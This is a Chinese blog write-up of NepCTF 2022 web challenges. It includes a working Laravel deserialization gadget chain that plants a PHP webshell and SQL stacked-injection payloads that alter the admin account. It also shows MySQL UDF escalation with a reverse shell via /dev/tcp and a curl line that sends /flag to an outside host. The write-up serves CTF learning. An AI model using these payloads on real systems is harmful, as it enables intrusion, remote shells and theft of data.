NepCTF 2022 Web

已于 2023-01-05 21:24:19 修改
阅读量949 收藏
点赞数 1
分类专栏: CTF write up 文章标签: web安全
于 2022-07-22 18:03:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43756333/article/details/125873031
版权

Just Kidding

题目提示Laravel反序列化
百度搜链子9.1.8
用的第三条

<?php
namespace Faker{
    class Generator{
        protected $providers = [];
        protected $formatters = [];
        function __construct()
        {
            $this->formatter = "register";
            $this->formatters = 9999;
        }

    }
}
namespace Illuminate\Routing{
    class PendingResourceRegistration{
        protected $registrar;
        protected $name;
        protected $controller;
        protected $options = [];
        protected $registered = false;
        function __construct()
        {
            $this->registrar = new \Faker\Generator();
            $this->name = "../public/shell.php";#找个可写目录
            $this->controller = '<?php system("cat /flag");?>';
            $this->options = 8;
        }

    }
}

namespace Symfony\Component\Mime\Part{
    abstract class AbstractPart
    {
        private $headers = null;
    }
    class SMimePart extends AbstractPart{
        protected $_headers;
        public $inhann;
        function __construct(){
            $this->_headers = ["register"=>"file_put_contents"];
            $this->inhann = new \Illuminate\Routing\PendingResourceRegistration();
        }
    }
}


namespace{
    $a = new \Symfony\Component\Mime\Part\SMimePart();
    $ser = preg_replace("/([^\{]*\{)(.*)(s:49.*)(\})/","\\1\\3\\2\\4",serialize($a));
    echo base64_encode(str_replace("i:9999","R:2",$ser));
}

www.zip下源码,全局搜索反序列化点入口
在这里插入图片描述

跳到hello路由,生成payload,传参
在这里插入图片描述在这里插入图片描述在这里插入图片描述

Callenger

Jd-gui反编译jar包保存为class,idea打开找到模板信息
在这里插入图片描述

直接搜 java-spring-thymeleaf 漏洞,payload
全局找到触发点
在这里插入图片描述
访问传参
在这里插入图片描述

博学多闻的花花

业务流程:注册-》登录-》做题-》提交选项-》查询成绩或排名
查看成绩会显示需要admin用户
在这里插入图片描述看各个文件代码,各个username和password都用addslashes_deep函数进行了过滤,只有index下提交问题答案这一块没有使用addslashes_deep函数
在这里插入图片描述并且注意到提交$query语句提交到后端执行的是multi_query函数,也就是支持多语句执行,因此,这里的考点为二次注入+堆叠注入
测试一下
当我们正常注册用户名为name,勾选答案后提交对数据库执行的操作是

<?php

function addslashes_deep($value){
    if (empty($value)){
        return $value;
    }else {
        return is_array($value) ? array_map('addslashes_deep', $value): addslashes($value);
    }
}

$username = "name";
$q1 = 1;
$q2 = 1;
$q3 = 1;
$q4 = 1;
$q5 = 1;
$query = "insert into score values (NULL, '".addslashes_deep($username)."', $getscroe);
insert into userAnswer values (NULL, '".$username."', '".$q1."', '".$q2."', '".$q3."', '".$q4."', '".$q5."')";

var_dump($query);

在这里插入图片描述若我们如下构造

<?php

function addslashes_deep($value){
    if (empty($value)){
        return $value;
    }else {
        return is_array($value) ? array_map('addslashes_deep', $value): addslashes($value);
    }
}

$username = "c','1','2','3','4','1');update users set studentid='qwert112211q1' where username='admin';#";
$q1 = 1;
$q2 = 1;
$q3 = 1;
$q4 = 1;
$q5 = 1;
$query = "insert into score values (NULL, '".addslashes_deep($username)."', $getscroe);
insert into userAnswer values (NULL, '".$username."', '".$q1."', '".$q2."', '".$q3."', '".$q4."', '".$q5."')";

var_dump($query);

那么就会在执行插入操作后,进行admin用户的密码更新操作
在这里插入图片描述这里迷了一下,开始疑惑为啥五个问题要用6个占位,后来看了下init.sql
在这里插入图片描述
除了id为自动增加之外,数据库的列数是有6个的
执行了将admin用户密码更改为admin123的语句后,利用修改的admin和密码即可查看score.php
在这里插入图片描述翻找给出的数据库配置文件和sql文件可以得知,flag存储在主机目录下,mysql给出了一个plugin目录
在这里插入图片描述那么进行udf提权
udf提权一般三个条件,plugin目录,有insert和delete权限,然后就是配置文件secure_file_priv为空
查询成绩后端代码同样没有过滤,可作为sql语句触发点
在这里插入图片描述解密sqlmap目录下准备好的so文件,导出hex值,可以用mysql select load_file,也可以用010editor进行导出,我这直接用工具导了
在这里插入图片描述
注入点依次执行语句
写入so文件

aaa';select 0x7... into dumpfile '/usr/lib64/mysql/plugin/c1aaa.so';#

aaa';CREATE FUNCTION sys_eval RETURNS STRING SONAME 'cacqq.so';#

aaa';select sys_eval("echo '/bin/sh -i >& /dev/tcp/xx.xx.xx.xx/xxxx 0>&1'|sh");#

反弹shell即可,这里学到一手,可以直接读flag SELECT sys_eval('curl http://xx.xx.xx.xx:xxxx -d @/flag)'

hui________
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
NepCTF比赛官方writeup1
08-04
NepCTF比赛官方writeup1
NepCTF2022
qq_53263789的博客
07-19 1208
nepctf2022 wp
MTCTF2022-pwn
m0_51185908的博客
10-04 706
MTCTF2022-PWN
NepCTF2022 WP
Pysnow's Blog
07-20 1855
NepCTFWriteUp
[CTF]-NepCTF2022
Mr.木Mu
07-20 4677
扫目录有 下载得到源码 代码审计 发现这个 php 文件中有一个反序列化的函数,存在反序列化漏洞查找 方法 跟进 中的 方法, 可以看到这里的 和 均为可控的, 寻找可用的 方法 这里跟进 中的 方法, 这里的 和 均是可控的.跟进 方法, 和 均是可控的,不难看出可以利用该方法中的 方法来进行命令执行的利用.现在需要解决的就是命令执行的语句, 注意到上图中的代码 这里可以通过 中的类中变量来控制 从而达到命令执行的目的. Challenger 代码审计 利用 模板
*CTF 2022 pwn examination
qq_62172019的博客
08-02 54
[*CTF 2022]examination
获取payload_由WCTF2020 Thymeleaf分析payload形式
weixin_42134097的博客
12-10 342
更多全球网络安全资讯尽在邑安全前段时间参加了WCTF2020比赛,当时主要是通过盲测的方式找到了正确的payload,但是对于网上出现的多种payload形式并不了解其原因,因此有了这篇文章。根据网上出现的payload以及比赛中用到的payload,主要有以下3种。__${xxx}__::.x__${xxx}__::__${xxx}__::x.Thymeleaf这道题采用的环境是Spr...
NepCTF2022 Writeup
个人博客:https://www.mrzry.top
07-19 1059
NepCTF2022 Writeup
NepCTF2023】复现
最新发布
leekos的博客,分享web安全相关知识~
08-16 4118
复现完这题学到了很多关于内网中代理等知识,学到了venom工具构造socks5代理,使用proxifier的方式打开工具,有点像给系统加了一个代理。
thymeleaf 学习笔记-基础篇
weixin_33708432的博客
12-30 1555
2019独角兽企业重金招聘Python工程师标准>>> ...
CTF---Web入门第九题 FALSE
weixin_34082789的博客
11-09 191
FALSE分值:10 来源: iFurySt 难度:易 参与人数:4567人 Get Flag:2144人 答题人数:2157人 解题通过率:99% PHP代码审计 hint:sha1函数你有认真了解过吗?听说也有人用md5碰撞o(╯□╰)o 格式:CTF{} 解题链接: ...
SpringBoot入门——Thymeleaf简单使用
Howie_T
11-21 331
本文只展示代码实现,具体参考此博客实现 举例使用Thymeleaf的:赋值,拼接,if判断,unless判断,for 循环,HTML文本替换 IndexController后台代码 @Controller public class IndexController { /*** * index页面 */ @RequestMapping("/Index")...
[VNCTF 2021]realezjvav 复现
feng的博客
03-16 1153
前言 这次VNCTF的题目还是挺难的,web唯一一道php直接把我按着锤,只会php的我居然第一时间先去复现这道java(笑) 复现 跟着ha1师傅的WP走一遍,中间自己还好没有出什么太大的问题,虽然不会java,但是也拿SpringBoot写过一点点东西,对于“大名鼎鼎”的fastjson也是有所耳闻。 进入环境,f12看一下源码,可以看到注释里写的:both username and password are right , then you can enter the next level。再根据h
[NepCTF]WEB
Huamang的博客
03-23 587
梦里花开牡丹亭 涉及到: pop链 命令执行 短字符命令执行 反序列化,代码审计 <?php highlight_file(__FILE__); error_reporting(0); include('shell.php'); class Game{ public $username; public $password; public $choice; public $register; public $file; public $fi
NepCTF web-little_trick
qq_34097497的博客
03-22 598
NepCTF web-little_trick 小白第一次写write up大佬别喷 0x01 原理分析 题目分析 题目中主要考察eval 利用 打开PHP手册 当len参数为 -1时,可以构造最多12个字符,回想到之前学习到的eval长度限制绕过 0x02 漏洞利用 ps:反引号`` 内的字符串,也会被解析成OS 命令。 例如 <pre> <?php if(isset($_GET['cmd'])){ $cmd=$_GET['cmd']; print `$cmd`;
NepCTF2021-Web部分(除画皮)
Y4tacker的博客
03-22 3345
文章目录little_trickfaka_revengeEasy_Tomcatbbxhh_revenge非预期预期 little_trick 打开环境发现代码是这个,太简单了,签到题 <?php error_reporting(0); highlight_file(__FILE__); $nep = $_GET['nep']; $len = $_GET['len']; if(intval($len)<8 && strlen($nep)&lt
CTF-Web小白入门篇超详细——了解CTF-Web基本题型及其解题方法 总结——包含例题的详细题解
热门推荐
日熙的博客
09-29 15万+
上次经过一次比赛的打击,决定不能只是一直盲目的刷基础题,应该加快进度,从各种基本题型开始下手,每种题型都应该去找题目刷一刷,并做好总结,于是乎决定写下这篇文章。之后会边做题边更新,欢迎各位大佬指教。 本文目录基础知识类题目总结:具体题型包括:HTTP头相关的题目Git源码泄露Python爬虫信息处理PHP代码审计(重要!!!)XSS题目绕过wafSQL注入 基础知识类题目 总结: 1.是最基本...
原生反序列化链 jdk8u20 的新构造
Chenhui98的博客
09-08 413
自己构造 jdk8u20 反序列化链子,构造思路比网上的大多数都简单很多,exp也更短感觉我之前那个 bypass__wakeup()的 trick 和 8u20 绕过 7u21 的方式异曲同工jdk8u20 是对 jdk7u21 这条链的绕过的,会调用的所有的invoke(),传入而 针对此 ,jdk7u25 的修复方式,是在的方法中尝试将this.type转换成,如果转换失败,就 throw Exception (而不是 直接 return ):值得注意的是的当中,除了第一行调用了的。
NepCTF2022 WEB 博学多闻的花花详解
SHININGENDING的博客
07-18 1036
有意思的一道题

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

hui________

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值